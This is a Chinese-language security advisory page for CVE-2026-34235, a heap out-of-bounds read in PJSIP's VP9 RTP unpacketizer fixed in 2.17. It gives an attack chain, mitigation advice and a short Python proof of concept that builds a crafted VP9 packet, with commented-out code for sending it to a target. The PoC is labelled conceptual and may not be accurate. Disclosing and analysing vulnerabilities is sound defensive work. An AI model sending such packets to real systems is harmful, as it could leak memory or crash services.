IPBUF安全漏洞报告
English
CVE-2026-34235 CVSS 9.1 严重

CVE-2026-34235 PJSIP VP9解包器堆越界读取漏洞

披露日期: 2026-03-31
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34235
漏洞类型
堆越界读取
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
PJSIP

相关标签

堆越界读取PJSIPVP9RTP拒绝服务信息泄露

漏洞概述

PJSIP是一个开源多媒体通信库。在2.17版本之前,其VP9 RTP解包器中存在一个堆越界读取漏洞。该漏洞发生在解析精心制作的VP9可伸缩结构(SS)数据时。由于对有效载荷描述符长度的边界检查不足,可能导致读取超出分配的RTP有效载荷缓冲区。攻击者可利用此漏洞造成信息泄露或拒绝服务。该问题已在2.17版本中修复。

技术细节

该漏洞位于PJSIP库处理VP9视频流的RTP解包逻辑中。具体而言,当解析VP9可伸缩结构(SS)数据时,程序未能充分验证有效载荷描述符的长度。这导致在对RTP数据包进行解包操作时,发生了堆越界读取。攻击者可以通过网络发送特制的VP9 RTP数据包,触发该漏洞。由于CVSS向量显示无需认证且无用户交互,远程攻击者即可利用此漏洞。成功利用可能导致敏感内存信息泄露(机密性影响),或者导致应用程序崩溃(可用性影响)。尽管完整性影响被标记为无,但这种内存破坏行为在特定条件下可能进一步导致更严重的后果。

攻击链分析

STEP 1
侦察阶段
识别网络上使用PJSIP库且启用了VP9编解码器的目标设备或服务。
STEP 2
构造攻击包
创建特制的VP9 RTP数据包,其中包含精心设计的可伸缩结构(SS)数据,利用边界检查不足的缺陷。
STEP 3
发送恶意数据
通过网络向目标设备的RTP端口发送构造好的恶意数据包。
STEP 4
触发漏洞
目标设备的PJSIP库在解析数据包时,执行堆越界读取操作,可能导致敏感信息泄露或服务崩溃。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import socket # Conceptual Proof of Concept for CVE-2026-34235 # Demonstrates crafting a malicious VP9 RTP packet to trigger heap out-of-bounds read. def craft_malicious_vp9_packet(): # RTP Header (simplified) rtp_header = bytes.fromhex("80 60 00 01 00 00 00 01 00 00 00 01") # VP9 Payload Descriptor with crafted Scalability Structure (SS) # Triggering the out-of-bounds read requires specific bit manipulation # in the SS header to specify a length exceeding the actual buffer. # Start of Payload Descriptor: I=1, P=0, L=0, F=0, B=0, E=0, V=1 (SS present) payload_descriptor_start = 0x10 # Crafted SS data indicating a larger structure than provided # This attempts to force the parser to read beyond buffer limits crafted_ss_data = bytes([payload_descriptor_start, 0x80, 0xFF, 0xFF]) return rtp_header + crafted_ss_data # Send the packet to a target PJSIP application (conceptual) # target_ip = "192.168.1.10" # target_port = 5004 # sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # sock.sendto(craft_malicious_vp9_packet(), (target_ip, target_port)) # print(f"PoC packet sent to {target_ip}:{target_port}") print("PoC generated for CVE-2026-34235: Heap out-of-bounds read in PJSIP VP9 unpacketizer.")

影响范围

PJSIP < 2.17

防御指南

临时缓解措施
如果无法立即升级,建议禁用VP9编解码器以缓解该风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表